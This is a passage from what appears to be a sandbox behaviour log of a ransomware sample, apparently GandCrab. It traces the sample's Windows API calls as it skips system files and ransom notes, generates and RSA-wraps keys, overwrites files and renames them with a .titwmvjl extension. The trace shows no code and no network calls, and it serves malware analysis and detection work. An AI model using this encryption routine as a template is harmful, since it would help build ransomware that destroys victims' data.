\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.437] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0070.437] CloseHandle (hObject=0x2bc) returned 1 [0070.438] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.438] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.438] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x2ea)) [0070.438] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.438] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.438] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.438] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a09d2ca4deb61a.lock") returned 79 [0070.438] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0070.439] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.440] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.440] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\") returned 55 [0070.440] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*" [0070.440] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5039b8 [0070.440] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.440] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.440] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.440] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.440] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.441] lstrcmpW (lpString1="AccessCache.accdb", lpString2=".") returned 1 [0070.441] lstrcmpW (lpString1="AccessCache.accdb", lpString2="..") returned 1 [0070.441] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="AccessCache.accdb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" [0070.441] lstrlenW (lpString=".titwmvjl") returned 9 [0070.441] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0070.441] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.441] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.titwmvjl") returned 81 [0070.441] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0070.441] lstrlenW (lpString=".accdb") returned 6 [0070.441] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.441] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".accdb ") returned 7 [0070.441] lstrcmpiW (lpString1=".accdb", lpString2=".titwmvjl") returned -1 [0070.441] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.441] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0070.441] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0070.441] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="desktop.ini") returned -1 [0070.441] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="autorun.inf") returned -1 [0070.441] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ntuser.dat") returned -1 [0070.441] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="iconcache.db") returned -1 [0070.441] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="bootsect.bak") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="boot.ini") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ntuser.dat.log") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="thumbs.db") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="KRAB-DECRYPT.html") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="CRAB-DECRYPT.html") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="KRAB-DECRYPT.txt") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="CRAB-DECRYPT.txt") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ntldr") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="NTDETECT.COM") returned -1 [0070.442] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="Bootfont.bin") returned -1 [0070.442] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0070.442] lstrlenW (lpString=".accdb") returned 6 [0070.442] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.442] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".accdb ") returned 7 [0070.442] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.442] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.442] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0070.443] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.443] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0070.465] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.465] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.466] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0070.466] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.466] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.466] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.466] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0070.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.467] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.467] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.467] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0070.467] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.467] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.468] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.468] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0070.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.468] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.468] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.468] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0070.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.469] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5032f8) returned 1 [0070.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.469] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0070.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.469] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0070.469] GetLastError () returned 0x0 [0070.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.469] CryptDestroyKey (hKey=0x5032f8) returned 1 [0070.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.470] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.470] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0070.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.470] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033b8) returned 1 [0070.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.470] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0070.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.471] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0070.471] GetLastError () returned 0x0 [0070.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.471] CryptDestroyKey (hKey=0x5033b8) returned 1 [0070.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.471] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.471] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0070.471] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0070.472] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0x31000, lpOverlapped=0x0) returned 1 [0070.502] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffcf000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.502] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x31000, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0x31000, lpOverlapped=0x0) returned 1 [0070.516] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.516] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0070.518] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.549] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.550] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.550] CloseHandle (hObject=0x2c4) returned 1 [0070.555] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\accesscache.accdb.titwmvjl"), dwFlags=0x1) returned 1 [0070.556] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.556] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.556] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.556] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.556] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a09d2ca4deb61a.lock" [0070.556] lstrlenW (lpString=".titwmvjl") returned 9 [0070.556] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a09d2ca4deb61a.lock") returned 79 [0070.556] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.556] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0070.556] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a09d2ca4deb61a.lock") returned 79 [0070.556] lstrlenW (lpString=".lock") returned 5 [0070.556] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.557] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.557] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.557] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.557] FindNextFileW (in: hFindFile=0x5039b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.557] lstrcmpW (lpString1="System.mdw", lpString2=".") returned 1 [0070.557] lstrcmpW (lpString1="System.mdw", lpString2="..") returned 1 [0070.557] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="System.mdw" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" [0070.557] lstrlenW (lpString=".titwmvjl") returned 9 [0070.557] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0070.557] VirtualAlloc (lpAddress=0x0, dwSize=0xc2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.557] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.titwmvjl") returned 74 [0070.557] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0070.557] lstrlenW (lpString=".mdw") returned 4 [0070.557] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.557] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".mdw ") returned 5 [0070.557] lstrcmpiW (lpString1=".mdw", lpString2=".titwmvjl") returned -1 [0070.558] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.558] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0070.558] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="desktop.ini") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="autorun.inf") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="ntuser.dat") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="iconcache.db") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="bootsect.bak") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="boot.ini") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="ntuser.dat.log") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="thumbs.db") returned -1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="KRAB-DECRYPT.html") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="CRAB-DECRYPT.html") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="KRAB-DECRYPT.txt") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="ntldr") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="NTDETECT.COM") returned 1 [0070.558] lstrcmpiW (lpString1="System.mdw", lpString2="Bootfont.bin") returned 1 [0070.558] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0070.558] lstrlenW (lpString=".mdw") returned 4 [0070.558] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.558] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".mdw ") returned 5 [0070.558] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.558] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.559] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\system.mdw"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0070.559] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.559] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0070.568] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.569] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.569] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0070.569] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.569] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.569] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.569] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0070.570] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.570] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.570] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.570] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.570] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0070.570] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.570] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.571] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.571] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0070.571] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.571] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.571] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.571] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.571] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0070.571] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.572] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503278) returned 1 [0070.572] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.572] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0070.572] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.572] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 